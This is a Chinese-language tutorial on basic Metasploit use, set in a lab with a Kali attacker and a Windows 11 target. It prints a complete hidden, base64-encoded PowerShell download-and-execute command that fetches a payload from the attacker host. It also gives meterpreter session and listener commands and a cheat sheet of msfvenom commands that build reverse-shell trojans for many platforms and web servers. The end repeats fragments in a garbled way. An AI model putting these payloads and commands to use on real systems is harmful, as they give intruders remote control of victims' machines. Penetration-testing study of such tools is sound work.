msf基础使用

MSF

msfconsole常规用法

终端输入msfconsole

通过命令执行连接对方主机

使用exploit/multi/script/web_delivery 模块

use exploit/multi/script/web_delivery

进入模块后可以使用以下命令，进行攻击的配置

show targets #查看可选择的目标类型
set target 对应编号|目标类型 #设置攻击目标
show payloads #查看可利用的payload，在选择完target后可显示对应的payload
set payload 对应编号|目标类型 #设置攻击载荷
show options #显示利用模块，所需参数，以及目前设置的参数
set lhost #设置服务器ip 填自己主机的 反向连接时需要
set lport #设置服务器端口
set rhost #设置目标主机ip
set rport #设置目标主机端口 
run / expliot #运行模块

这里演示一下对windows的攻击，前提是需要在目标主机上可以命令执行

攻击主机kali:192.168.52.128 靶机windows11

复制上面显示的这段命令

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB4AEcAWgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJAB4AEcAWgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAHgARwBaAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUAMgAuADEAMgA4ADoAOAAwADgAMAAvAGIATQBXAHMAdwBZAHMATABhAFkAagBEAC8AQQBXAEUAMQBvAHkARwBTAEkAcQBlAGIAagB2ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQAyAC4AMQAyADgAOgA4ADAAOAAwAC8AYgBNAFcAcwB3AFkAcwBMAGEAWQBqAEQAJwApACkAOwA=

目标主机运行

这里运行后，可能会卡住，直接摁回车

然后输入sessions 即可以查看是否成功控制目标主机

关于session相关命令

show sessions | sessions #显示获取的所有会话
sessions -i 对应的会话id #使用此会话，并且进入meterpreter后渗透模块
进入meterpreter 切记不要随便使用exit离开,会导致会话直接消失
可以使用background 进行后台运行sessions #后台运行sessions

结合Msfvenom模块进行后门攻击

exploit/multi/handler模块 eg.这里依然以windows举例

use exploit/multi/handler  
set payloa windows/meterpreter/reverse_tcp
set lhost 192.168.52.128
set lport 1111
exploit -z -j#后台执行

前提是利用Msfvenom生成木马，并且在目标主机上执行此木马

这里不举例了，想看例子的可以查看这篇msf生成木马_msfvenom -p linux/x86/meterpreter/reverse_tcp lhos-CSDN博客

博客

Msfvenom生成木马

常用命令生成木马

Linux

　　msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

　msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads

PHP

　　msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

　msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

　msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads

Python

　　msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

　　msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

　　msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

hell.sh

Perl

```bash
　　msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl